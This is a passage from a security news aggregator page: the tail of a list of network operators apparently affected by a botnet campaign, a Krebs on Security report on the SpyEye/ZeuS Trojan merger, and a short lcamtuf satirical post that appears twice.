DWL-AS-IN Dishnet Wireless Limited. Broadband Wireless
DYNDNS – Dynamic Network Services, Inc.
EASYDNS EasyDNS Technologies, Inc.
EASYNET Easynet Global Services
EBAY – eBay, Inc
ECI-TELECOM-LTD ECI Telecom-Ltd.
EDGECAST – EdgeCast Networks, Inc.
EIRCOM Eircom
ELISA-AS Elisa Oyj
EMBARQ-WNPK – Embarq Corporation
EMBIT-AS BURTILA & Co. ELECTRON M.BIT SRL
EMC-AS12257 – EMC Corporation
EMCATEL
EMIRATES-INTERNET Emirates Internet
EMOBILE eMobile Ltd.
ENTEL CHILE S.A.
EPM Telecomunicaciones S.A. E.S.P.
EQUANT-ASIA Equant AS for Asian Region covering Japan
EQUINIX-EDMA-ASH-ASN – Equinix, Inc.
ERICSSON-APAC-MY-AS Ericsson Global Services. BUGS N&V APAC
ERX-SINGNET SingNet
ESRI – Environmental Systems Research Institute
ESS-PR-WEBMASTERS – ESS/PR WebMasters
EthioNet-AS
ETISALAT-MISR
ETPI-IDS-AS-AP Eastern Telecoms Phils., Inc.
ETSI Autonomous System
EURONET Online Breedband B.V. Global AS
European Space Agency
EUSKALTEL Euskaltel S.A.
EXCELL-AS Excellmedia
EXIM – Export Import Bank of the U.S
FACEBOOK – Facebook, Inc.
FANNIEMAE – Fannie Mae
FasoNet-AS
FASTMETRICS – Fastmetrics, LLC
FAST-TELCO Fast Telecommunications Company W.L.L.
FASTWEB Fastweb SpA
FAWRI-AS
FDA – Parklawn Computer Center / DIMES HQ
FIBREONE-AS fibre one networks GmbH, Duesseldorf
FITC-AS – FITC – FedEx International Transmission Corporation
FMAC-I-BILLING – Freddie Mac
FMI-NET-AS – Freeport-McMoran Inc.
FORATEC-AS Foratec Communication AS at Sverdlovsk, Tyumen, Perm regions
FORTINET-CANADA – Fortinet Inc.
FPT-AS-AP The Corporation for Financing & Promoting Technology
FRONTIER-AND-CITIZENS – Frontier Communications of America, Inc.
FRONTIER-FRTR – Frontier Communications of America, Inc.
FR-RENATER Reseau National de telecommunications pour la Technologie
FULLRATE Fullrate A/S
FX-PRIMARY-AS FX Networks Limited
GBLX Global Crossing Ltd.
GET-NO GET Norway
GHANATEL-AS
GIGAINFRA Softbank BB Corp.
GLOBAL-SPLK – Sprint International
GLOBE-TELECOM-AS Globe Telecoms
GOLDENLINES-ASN 012 Smile Communications Main Autonomous System
GOLDENTELECOM-UKRAINE Golden Telecom
GOOGLE – Google Inc.
GRAMEENPHONE-AS-AP GrameenPhone Ltd.
GSA-GOV – General Services Administration
GT-BELL – Bell Canada
Gtd Internet S.A.
GYRON ====
H3G-AS H3G S.p.A.
H3GUKNIE Hutchison 3G UK and Ireland Core AS
HANARO-AS Hanaro Telecom Inc.
HATHWAY-NET-AP Hathway IP Over Cable Internet
HETZNER-AS Hetzner Online AG RZ
HHES – HAMILTON HYDRO ELECTRIC SYSTEM
HINET Data Communication Business Group
HKNET-AP HKNet Co. Ltd
HKTIMS-AP PCCW Limited
HNS-DIRECPC – Hughes Network Systems
HOPONE-GLOBAL – HopOne Internet Corporation
HOSTEUROPE-AS AS of Hosteurope Germany / Cologne
HP-INTERNET-AS Hewlett-Packard Company
HTCL-IAS-HK-AP Hutchison Telephone Company Limited
HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd
HURRICANE – Hurricane Electric, Inc.
HUTCHISON-AS-AP Hutchison Global Communications
HUTCHVAS-AS Vodafone Essar Ltd., Telecommunication – Value Added Services,
IADB-NETWORKS – The Inter-American Development Bank
IAM-AS
IBM E-business Hosting Delivery
IBMCCH-RTP – IBM
IBMCCH-SBY – IBM
IBMDES-AS – IBM Dallas Engineering & Scientific
IBSNAZ Telecom Italia S.p.a.
IBURST-GH
ICONNECT-BD Planners Tower
IDK-NETWORK CJSC Interdnestrcom AS
IEUNET BT Ireland Backbone
IFX-NW – IFX Communication Ventures, Inc.
IHNET – IHNetworks, LLC
IINET iiNet Limited
IJ-NET – Internet Junction Corp.
ILX-ASN – THOMSON FINANCIAL
IN2CABLE-AP AS Number of In2cable.com (India) Ltd.
INDONET-AS-AP INDO Internet, PT
INDOSATM2-ID INDOSATM2 ASN
INEA-AS INEA S.A.
INET-AS-ID PT. Inet Global Indo
INETCOMM-AS INET LTD
I-NETPARTNER-AS I-NetPartner GmbH ASN
INETTEHNO Inet Tehno
INFINEON-AS Infineon AG
INFINEON-SG 8 Kallang Sector
INFLOW19294 – Inflow Inc.
INFOSPHERE NTT PC Communications, Inc.
INFOSTRADA Infostrada S.p.A.
INIT7 Init7 Global Backbone
INS-AS – AT&T Data Communications Services
Instituto Costarricense de Electricidad y Telecom.
Instituto Tecnol??gico y de Estudios Superiores de Monterrey
INTEGRATELECOM – Integra Telecom, Inc.
INTELSAT Intelsat Global BGP Routing Policy
INTEL-SC-AS – Intel Corporation
INTERNAP-2BLK – Internap Network Services Corporation
INTERNAP-BLK – Internap Network Services Corporation
INTERNAP-BLK – Internap Network Services Corporation
INTERNAP-BLK3 – Internap Network Services Corporation
INTERNAP-BLOCK-4 – Internap Network Services Corporation
INTERNETIA-AS Netia SA
INTERNET-PATH – Internet Path, Inc.
INTERNET-PRO-AS Internet-Pro Ltd
INTEROUTE Interoute Communications Ltd
INTERPHONE-AS Interphone Ltd.
INTERTELECOM Intertelecom
IPASAULE-AS _Interneta Pasaule_ SIA
IPG-AS-AP Philippine Long Distance Telephone Company
IPGOMA – THE INTERPUBLIC GROUP OF COMPANIES, INC.
IPNXng
IPO-EU IP-Only Telecommunication Networks AB
IQUEST-AS – IQuest Internet
IRONPORT-SYSTEMS-INC – Cisco Systems Ironport Division
IRS – Internal Revenue Service
IS
ISC-AS1280 Internet Systems Consortium, Inc.
ISKON ISKON INTERNET d.d. za informatiku i telekomunikacije
ISKRATELECOM-AS ISKRATELECOM ZAO
ISP-KIM-NET Kalush Information Network LTD
ISSC-AS – ISSC
ISW – Internet Specialties West Inc.
ITNS ITNS. NET SRL
ITSCOM its communications Inc.
JAWWAL Jawwal will be multihoming with us AS15975 and AS12975
JAZZNET Jazz Telecom S.A.
Jordan Data Communications Company LLC
JUNIPER-NETWORKS – Juniper Networks, Inc.
KABELBW-ASN Kabel Baden-Wuerttemberg GmbH & Co. KG
KAISER-NCAL – Kaiser Foundation Health Plan
KAMOPOWER – KAMO Electric Cooperative, Inc.
KAZTELECOM-AS JSC Kazakhtelecom
KHERSON-TS Kherson Telecommunication Systems Ltd.
KIXS-AS-KR Korea Telecom
K-OPTICOM K-Opticom Corporation
KSNET KSNet
KSNET-AS Kyivstar GSM
KVH KVH Co.,Ltd
LANTELECOM-AS Lan-Telecom AS Number
LATISYS-ASHBURN – Latisys-Ashburn, LLC
LATNETSERVISS-AS LATNET ISP
LDCOMNET NEUF CEGETEL (formerly LDCOM NETWORKS)
LEASEWEB LEASEWEB AS
LEVEL3 Level 3 Communications
LGCNS-AS – LG CNS America Inc.
LGDACOM LG DACOM Corporation
LGH-AS-KR LGHitachi
LGNET-AS-KR LG CNS
LINKdotNET-AS
LINKLINE – LinkLINE Communications, Inc.
LINKNET-ID-AP Linknet ASN
LOQAL-AS Loqal AS
LUCENT-CIO – Lucent Technologies Inc.
LUGANET-AS ARTA Ltd
LVBALTICOM-AS _Balticom_ JSC
LVLT594-598 – Level 3 Communications, Inc.
LYSE-AS Altibox AS
MAGNUS-AS TOV _Magnus Limited_
MANGOTELESERVICE-AS-BD Only private Owned IIG in Bangladesh
MAP Moscow Network Access Point
MASERGY-US Masergy US Autonomous System
MASSCOM – Massillon Cable Communications
MAXIS-AS1-AP Binariang Berhad
MBL-AS-AP Micronet Broadband (Pvt) Ltd.
MCAFEE – McAfee, Inc.
MCAFEE-COM – McAfee, Inc.
MCC OJSC _Moscow Cellular Communications_,
MCI-ASN – MCI
MCT-SYDNEY Macquarie Telecom
MDITNET-AS ITNET (ITPAY SRL)
MEDIASERV-AS Mediaserv
Mega Cable, S.A. de C.V.
MEGAPATH2-US – MegaPath Networks Inc.
METROTEL REDES S.A.
MF-KAVKAZ-AS Caucasus Branch of OJSC MegaFon AS
MF-NWGSM-AS North-West Branch of OJSC MegaFon Network
MFNX MFN – Metromedia Fiber Network
MICRON21-AS-AU-AP Micron21 Melbourne Australia Datacentre. Co-Location Dedicated Servers Web Hosting
MICROSOFT-CORP-AS – Microsoft Corp
MICROSOFT-CORP—MSN-AS-BLOCK – Microsoft Corp
MISD-NET – Macomb Intermediate School District
MIT-GATEWAYS – Massachusetts Institute of Technology
MOLDCELL_AS Moldcell SA Autonomous System
MOLDDATA-AS Administrator of the top level domain .MD,
MOLDTELECOM-AS Moldtelecom Autonomous System
MORENET – University of Missouri – dba the Missouri Research and Education Network (MOREnet)
MOTOROLA – Motorola, Inc.
MOTOROLA-PHX – Motorola, Inc.
MP-ELEKTRONIKA-AS MP ELEKTRONIKA Autonomous System
MPX-AS Microplex PTY LTD
MTNL-AP Mahanagar Telephone Nigam Ltd.
MTS-INDIA-IN 334,Udyog Vihar
MTSNET OJSC _Mobile TeleSystems_ Autonomous System
N9E7X5E3N1I2N4C – Nexen Inc.
NAWALA-AS-ID Asosiasi Warung Internet Indonesia (AWARI)
NAWRAS-AS Omani Qatari Telecommunications Company SAOC
NBLNETWORKS-AS Nebula Oy Autonomous System
NC-FUNB-AS – WACHOVIA CORP
NCNET-AS National Cable Networks
NEOLINK CJSC _ER-Telecom Holding_ Izhevsk branch
NERIM Nerim SAS
NET-ACCESS-CORP – Net Access Corporation
NET-AIG – American International Group (AIG) Data Center, Inc.
NETCOM-AS NetCom as Autonomous system
NETELLIGENT – Netelligent Hosting Services Inc.
NEWCOM-AS NEWCOM mirror object from ARIN
NEWCOM-ASN New Com Telecomunicatii SA
NEWEDGENETS – New Edge Networks
NEWSKIES-NETWORKS SES WORLD SKIES ARIN AS, for routing RIPE space.
NEWTT-IP-AP Wharf T&T Ltd.
NEXTGENTEL NEXTGENTEL Autonomous System
NEXTTELL-VRN-AS LLC NextTell-Voronezh AS Number
NG-AS NextGen Communications SRL
NIANET-AS nianet is a Danish carrier and Internet Service Provider
NO_NAME
NOC – Network Operations Center Inc.
NOKIA Nokia Internet
NOKIA-AS NOKIANET APAC Data Centre network
NOKIANET_DALLAS NOKIANET Dallas office
Nominum Global NameServer network
NOMINUM-SKYE1 – SKYE
NORDLINKS-AS S.C. _NordLinks_ S.R.L.
NORMA-PLUS-AS TOV Norma Plus
NORTHROP-GRUMMAN – Northrop Grumman
NOVELL – Novell, Inc.
NTL Virgin Media Limited
NTT do Brasil Telecomunicaoes Ltda
NTT-COMMUNICATIONS-2914 – NTT America, Inc.
NUMERICABLE NUMERICABLE is a cable network operator in France, offering TV,VOICE and Internet services
NUVOX – NuVox Communications, Inc.
NV-ASN 013 NetVision Ltd.
NYFX-RTR – NYFIX, INC
O1COMM – O1 COMMUNICATIONS
OCN NTT Communications Corporation
OFIDEN – OppenheimerFunds, Inc.
OMD-FNO Orange Moldova Fix Network Autonomous System
OMNITURE ====
OPENDNS – OpenDNS, LLC
ORANGE-BUSINESS-SERVICES-SOUTHEUR Equant Inc.
ORANGE-BUSINESS-SERVICES-UK Orange Business Services (formerly Equant) AS for UK
OSIS-PACOM – Joint Intelligence Center Pacific
OVH OVH
P4NET P4 Sp. z o.o.
PACIFIC-INTERNET-INDIA-ASN Pacific Internet India Pvt. Ltd.
PACIFIC-INTERNET-IX Pacific Internet Ltd
PACNET Pacnet Global Ltd
PAH-INC – GoDaddy.com, Inc.
PAIR-NETWORKS – pair Networks
PALTEL-AS PALTEL Autonomous System
PARTNER-AS Partner Communications Ltd.
PBTL-BD-AS-AP Pacific Bangladesh Telecom Limited.
PDX – PORTLAND INTERNETWORKS
PEER1 – Peer 1 Network Inc.
Pegaso PCS, S.A. de C.V.
PERSNET Korea Telecom Freetel
PI-AU Pacific Internet (Australia) Pty Ltd
PI-HK Pacnet Internet (Hong Kong) Limited
PIXNET-AS – Providers Internet Exchange
PKTELECOM-AS-PK Pakistan Telecom Company Limited
PLUSSERVER-AS PlusServer AG, Germany
POLYCOM – Polycom, Inc.
POWEREDCOM KDDI CORPORATION
Prima S.A.
PRIMORYE-AS Open Joint Stock Company _Far East Telecommunications Company_
PRINCETON-AS – Princeton University
PROBENETWORKS-AS Probe Networks
PRONET_LV SIA _PRONETS_
PROXAD Free SAS
PS-NETPLEX-AS – Perot Systems
PT KPN Internet Solutions
PTK-CENTERTEL-DSL-AS PTK Centertel Sp. z o.o.
PTLP-CORE – People_s Tel Limited Partnership
PTPRIMENET PT PRIME – Solucoes Empresariais de Telecomunicacoes e Sistemas S.A.
PUBNET1-AS KT
PUSAN-AS-KR Pusan National University
PWC-AS – PriceWaterhouseCoopers, LLP
Q9-AS – Q9 Networks Inc.
Q9-AS-BRAM – Q9 Networks Inc.
QNETCZ QNET CZ s.r.o.
QSC-1 QSC AG
QUALCOMM – Qualcomm, Inc.
QUALCOMM-BLR-AS-AP Qualcomm Inc. Bangalore AS, Developer of CDMA Technology India
QWEST – Qwest Communications Company, LLC
RACKSPACE – Rackspace Hosting
RADIOGRAFICA COSTARRICENSE
RAPID-LINK-AS RAPID LINK SRL
RAYA-AS
RCN-AS – RCN Corporation
RDSNET RCS & RDS S.A.
Rede Nacional de Ensino e Pesquisa
REEDLAN-AS ISP REEDLAN
RELARN RELARN-MSK
RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI
RELIANCEGLOBALCOM – Reliance Globalcom Services, Inc
RENAM RENAM Association
RIML-CORP-AS-3 – Research In Motion Limited
RIPE-NCC-AS RIPE Network Coordination Centre
RISC-SYSTEM – Rockwell Scientific Company
RMH-14 – Rackspace Hosting
RMIFL RM Education PLC – Internet for Learning
ROGERS-CABLE – Rogers Cable Communications Inc.
ROSTELECOM-AS JSC Rostelecom
ROSTOV-TELEGRAF-AS Rostovelectrosviaz_ of Public Joint Stock Company
RTCOMM-AS OJSC RTComm.RU
RTD ROMTELECOM S.A
RUSTAVI2ONLINEAS Caucasus Online LLC
RU-SURNET Uralsvyazinform, Chelyabinsk branch
RWT – RagingWire Telecommunications
SAFELINES The network of ISP Safelines,includes POPs in various cities
SAFENZ-TRANSIT-AS-NZ SafeNZ Networks LTD
SAITIS-NETWORK Saitis Network, N.Desir
SAMSUNGNETWORKS-AS-KR Samsung Networks Inc.
SAN-JUAN-CABLE – San Juan Cable, LLC
SASUSA SunGard Availability Services USA
SAVVIS – Savvis
SBIS-AS – AT&T Internet Services
SCARTEL-AS Scartel Ltd.
SCOTTS-AS – CITY OF SCOTTSBURG
SCRR-10796 – Road Runner HoldCo LLC
SCRR-11426 – Road Runner HoldCo LLC
SCRR-12271 – Road Runner HoldCo LLC
SCV-AS-AP SCV Broadband Access Provider
SDL-20-AS – Smithville Digital, LLC
SEAGATE-USA-MN-1 – Seagate Technology
SEEDNET Digital United Inc.
SELECTNET-AS – SelectNet Internet Services
SERBIA-BROADBAND-AS Serbia BroadBand-Srpske Kablovske mreze d.o.o.
SERVICENET-AP Internet service provision to Western
SGNET-AS-AP Singapore Government Network AS
SHAW – Shaw Communications Inc.
SIBNETWORKS-AS Siberian Networks
SIFY-AS-IN Sify Limited
SIGMANET-NIC LU MII AS
SIKA-AS Sika Informationssysteme AG
SITA SITA
sixtelecoms-as
SKTELECOM-NET-AS SK Telecom., Ltd.
SKYNET-SPB-AS SkyNet Ltd.
SKYVISION SkyVision Network Services
SLTINT-AS-AP Sri Lanka Telecom Internet
SOFTLAYER – SoftLayer Technologies Inc.
SOFTNET-AS-AP Software Technology Parks of India – Bangalore
SOLNET BSE Software GmbH
SONICDUO-AS AS for MegaFon-Moscow
SONOMA – Sonoma Interconnect
SONY-APAC-AP Sony – ASN for Asia Pacific
SOVAM-AS OJSC _Vimpelcom_
SPBMTS-AS Mobile TeleSystems, OJSC, MR North-West
SPCS – Sprint Personal Communications Systems
SPEAKEASY – Speakeasy, Inc.
SPECTRANET FIRST FIBRE BROADBAND NETWORK IN NEW DELHI, INDIA
Sprint US
SPRINTLINK – Sprint
SPRINTLINK-HOSTING – SPRINT, Business Serices Group
SS-NOC-AS – Straitshot Communications, Inc.
STARHUBINTERNET-AS StarHub Internet Exchange
STARNET-AS StarNet Moldova
STATEL-AS Stavropol branch of Southern Telecommunications Company
STEADFAST – Steadfast Networks
STOMI – State of Michigan, DMB-CNOC
STSN-SLC-UT-US – STSN GENERAL HOLDINGS, INC.
SUDDENLINK-COMMUNICATIONS – Suddenlink Communications
SUMTEL-AS-RIPE Summa Telecom
SUNCOMMUNICATIONS-AS JV _Sun Communications_ Autonomous System
SUNRISE Sunrise Communications AG
SUPERNET-PAKISTAN-AS-AP Supernet Limited Transit Autonomous System Number
SURFCONTROL-US-ASN Websense Hosted Security Network
SURFNET-NL SURFnet, The Netherlands
SWEETNET-AS Private entrepreneur Bliznichenko Vitalij Volodumirovich
SWISSCOM Swisscom (Switzerland) Ltd
SWITCH SWITCH, Swiss Education and Research Network
SWKO – SOUTHWEST KANSAS ONLINE
TACHYON-AS-ID PT Remala Abadi
TATA-AS TATA ISP
TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
TATTELECOM-AS Tattelecom.ru/Tattelecom Autonomous System
TC Radio Systems Autonomous System
TCH – TCH Network Services
TDC TDC Data Networks
TDDE-ASN1 Telefonica o2 Germany Autonomous System
TDN Tikona Digital Networks Pvt Ltd.
TEAM-CYMRU – Team Cymru Inc.
TE-AS TE-AS
TELCOMNET TelCom Ltd.
TELCOM-UA-AS _Telecomunikatsiina Companiya_ Ltd
TELE2
Telecom Argentina S.A.
TELECOMMD-AS ICS Networks Solutions SRL
Telecomunicacoes da Bahia S.A.
TELEFONICA CHILE S.A.
Telefonica de Argentina
Telefonica Empresas SA
TELEFONICA-DATA-ESPANA Internet Access Network of TDE
TELEKOM-AS TELEKOM SRBIJA a.d.
TELENERGO EXATEL S.A. Autonomous System
TELENET-AS Autonomous System of Teleset-Servis Ltd.
TELENET-AS Telenet N.V.
TELENOR-NEXTEL Telenor Norge AS
TELESC – Telecomunicacoes de Santa Catarina SA
TELESWEET-AS Telesweet ISP Autonomous System
TELETECH – TeleTech Holdings, Inc
Television Internacional, S.A. de C.V.
TELEZUG WWZ Telekom AG
TELIANET-DENMARK TeliaNet Denmark
TELIANET-SWEDEN TeliaNet Sweden
TELKOMNET-AS2-AP PT Telekomunikasi Indonesia
TELKOMSEL-ASN-ID PT. Telekomunikasi Selular
TELLCOM-AS Tellcom Iletisim Hizmetleri
Telmex Chile Internet S.A.
Telmex Colombia S.A.
TELSTRA Telstra Pty Ltd
TEOLTAB TEO LT AB Autonomous System
TERREMARK Terremark
TFN-TW Taiwan Fixed Network, Telco and Network Service Provider.
TFO-BOSTON – THOMSON FINANCIAL
THEPLANET-AS – ThePlanet.com Internet Services, Inc.
T-HT T-Com Croatia Internet network
TINET-BACKBONE Tinet SpA
TISCALI-UK Tiscali UK
TISNL-BACKBONE Telfort B.V.
TKPSA-AS TKP S.A. is 3S.pl network operator.
TKT-AS JSC TKT
TMIB-BD-AS-AP TM International Bangladesh Ltd. ISP, Gulshan-1,Dhaka-1212
TMN-AS TMN Autonomous System
TMNET-AS-AP TM Net, Internet Service Provider
TM-NETSYS-ASH – TicketMaster
TOMLINE Tomsk telecommunication company Ltd
TOTNET-TH-AS-AP TOT Public Company Limited
TPG-INTERNET-AP TPG Internet Pty Ltd
TPNET Telekomunikacja Polska S.A.
TRANSTEL S.A.
TRAVELERS – Travelers Property Casualty Corp.
TRENDMICRO Global IDC and Backbone of Trend Micro Inc.
TRENDMICRO Trend Micro Inc.
TRUENORTHCOMM – True North Communications
TSF-IP-CORE TeliaSonera Finland IP Network
TSU-SM – Texas State University – San Marcos
TTCLDATA
TTNET Turk Telekomunikasyon Anonim Sirketi
TTSL-MEISISP Tata Teleservices ISP AS
TULIP Tulip Telecom Ltd.
TURKCELL-AS TURKCELL ILETISIM HIZMETLERI A.S.
TVCABO-AS TVCABO Autonomous System
TWTC – tw telecom holdings, inc.
UAEXPRESS EXPRESS Radio Network
UARNET-AS Ukrainian Academic and Research Network
UA-SEECH Seech-Infocom NCC
UA-SMART-AS Broadcasting company _Smart_ Ltd
UCOM UCOM Corp.
UCSB-NET-AS – University of California, Santa Barbara
UCSC – University of California, Santa Cruz
UDMVT-AS OJSC VolgaTelecom branch in Udmurtia Republic AS Number
UECOMM-AU Uecomm Ltd
UKRBIT-NET-AS SPD Bilopol Roman Leonidovich
UKRTELNET JSC UKRTELECOM,
ULTRADNS – Centergate Research, LLC.
UMANITOBA – University of Manitoba
UMC-AS UMC Autonomous System
UMICH-AS-5 – University of Michigan
UMN Ural-TransTeleCom Autonomous System
UNI2-AS France Telecom Espana SA
Uninet S.A. de C.V.
UNINETT UNINETT, The Norwegian University & Research Network
UNISYS-6072 For routing issues, email hostmaster@unisys.com
UNISYS-AP-UI-AS-AP Unisys AsiaPac Intranet Access to Internet
UNISYS-AS-E – Unisys Corporation
Universidad Nacional de Colombia
University de Los Andes
UNL-AS – University of Nebraska-Lincoln
UNSPECIFIED
UPC UPC Broadband
UPITT-AS – University of Pittsburgh
URAN URAN Autonomous system
USAA – USAA
USI Uralsviazinform
UUNET – MCI Communications Services, Inc. d/b/a Verizon Business
UUNET-INT – MCI Communications Services, Inc. d/b/a Verizon Business
VEGA-OD-UA DCS Ltd.
VERISIGN-CORP – VeriSign Infrastructure & Operations
VERSATEL AS for the Trans-European Tele2 IP Transport backbone
VIA-NET-WORKS-AS PSINet Europe / VIA NET.WORKS international AS
VIAPASS-FR VIAPASS SAS
VIDEOTRON – Videotron Telecom Ltee
VIETEL-AS-AP Vietel Corporation
VINAKOM – VINAKOM COMMUNICATIONS
VINS – ViaWest
VIRGINIA-AS – University of Virginia
VITSSEN-SUWON-AS-KR Tbroad Suwon Broadcating Corporati
VMWARENET-1 – VMWare, Inc.
VNET-AS VNET ISP Bratislava, Slovakia, SK
VNPT-AS-VN Vietnam Posts and Telecommunications (VNPT)
VODAFONE_ICELAND Backbone Autonomous System
VODAFONE-IT-ASN Vodafone N.V.
VODANET International IP-Backbone of Vodafone
VOLIA-AS Kyivski Telekomunikatsiyni Merezhi LLC
VOLKSWAGEN Volkswagen AG, Wolfsburg 1
VRIS-AS-BLOCK – Verizon Online LLC
VSI-AS VSI AS
VTX-NETWORK VTX Services SA
VZB-AU-AS Verizon Australia PTY Limited
VZGNI-TRANSIT – Verizon Online LLC
WATEEN-IMS-PK-AS-AP National WiMAX/IMS environment
WAYPORT – AT&T Wi-Fi Services
Webex Communications, Inc.
WEBSENSE Websense, Inc.
WELLSFARGO – Wells Fargo & Company
WESTHOST – WestHost, Inc.
WESTNET-AS-AP Westnet Internet Services
WESTPUB-A – West Publishing Corporation
WICAM-AS WiCAM ISP Cambodia Peering AS
WIDEXS ion-ip B.V.
WINDSTREAM – Windstream Communications Inc
WIRELESSNET-ID-AP WIRELESSNET AS
WITCOM- Wiesbadener Informations – und Telekommunikations GmbH
WN-AS Private enterprise Gorbunov A.A.
WORLDBANK-AS – WORLD BANK
WORLDCALL-AS-LHR Worldcall Broadband Limited
WORLDNET-AS World Net & Services Co., Ltd.
WOW-INTERNET – WideOpenWest Finance LLC
WXC-AS-NZ WorldxChange Communications LTD
WYOMING – wyoming.com
XO-AS15 – XO Communications
XS4ALL-NL XS4ALL
XTRA-AS Telecom XTRA, Auckland, NZ
YAHOO-BANGALORE-AS-AP Yahoo Bangalore Network Monitoring Center
YAHOO-US – Yahoo
ZIGGO Ziggo – tv, internet, telefoon
ZIPNETBD-DKB-AS-AP Zipnet Limited DKB AS number

The following chart maps the location of more than 300 command and control networks that were used in these attacks. 299 of them were located in China.

The geographic location of the more than 300 control networks used in the attacks.

Krebs on Security: Revisiting the SpyEye/ZeuS Merger

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

In October 2010, I discovered that the authors of the SpyEye and ZeuS banking Trojans — once competitors in the market for botnet creation and management kits — were planning to kill further development of ZeuS and fuse the two malware families into one supertrojan. Initially, I heard some skepticism from folks in the security community about this. But three months later, security experts are starting to catch glimpses of this new hybrid Trojan in the wild, with the author(s) shipping a series of beta releases that include updated features on a nearly-daily basis.

It probably didn’t help that the first report of a blended version of SpyEye/ZeuS (referred to as SpyZeuS for the remainder of this post) — detailed in a McAfee blog post — turned out to be a scam. But a little more a week ago, Trend Micro spotted snapshots and details of SpyZeuS components, noting that the author appears to have received help from other criminals in polishing this latest release; in particular, an add-on that grabs credit card numbers from hacked PCs, and a plugin designed to attack the anti-Trojan tool Rapport from Trusteer. (Trusteer’s Amit Klein addresses this component in a blog post here).

Seculert, a new threat alert service started by former RSA fraud expert Aviv Raff, includes some screen shots of the administrative panel of SpyZeuS that show the author trying to appeal to users of both Trojans, by allowing customers to control and update their botnets using either the traditional ZeuS or SpyEye Web interface.

The hybrid SpyZeuS Trojan lets users interact with bots via the ZeuS control panel (left) or the SpyEye interface.

Raff said the author(s) has been adding new features to both the bot and the control panels nearly every day.

“This is under heavy development at the moment,” Raff said. “That’s why the version we wrote about was called 1.3.05 Beta, because it’s still not the [general availability] version. The author is still trying things out.”

The same day Raff’s post went up, a source forwarded me a link to a video posted to a popular hacker forum by a SpyZeuS customer who was using an even newer version, v. 1.3.09 Beta. The video (which the poster starts with a typo confusing ZeuS and SpyEye) shows how this user managed to hack the protection scheme built into SpyEye that is supposed to prevent buyers from making unauthorized copies of the crimeware package. Very shortly after posting that video, the user who recorded it had his forum account compromised and his personal and financial details posted online.

Update, 10:26 a.m.: Added response from Trusteer. Also, a previous version of this post incorrectly attributed a McAfee blog post to Trend Micro. The above text has been corrected.

lcamtuf's blog: The dreaded curse of openness

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Several weeks ago, the chairman of Trend Micro had this to say:

“Android is open-source, which means the hacker can also understand the underlying architecture and source code. We have to give credit to Apple, because they are very careful about it. It’s impossible for certain types of viruses to operate on the iPhone.”

Now that Kaspersky has, ahem, joined the open source crowd – I worry that hackers may soon be able to understand the operation of anti-virus software as well. And beyond that unthinkable point, only darkness looms.

lcamtuf's blog: The dreaded curse of openness

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Several weeks ago, the chairman of Trend Micro had this to say:

“Android is open-source, which means the hacker can also understand the underlying architecture and source code. We have to give credit to Apple, because they are very careful about it. It’s impossible for certain types of viruses to operate on the iPhone.”

Now that Kaspersky has, ahem, joined the open source crowd – I worry that hackers may soon be able to understand the operation of anti-virus software as well. And beyond that unthinkable point, only darkness looms.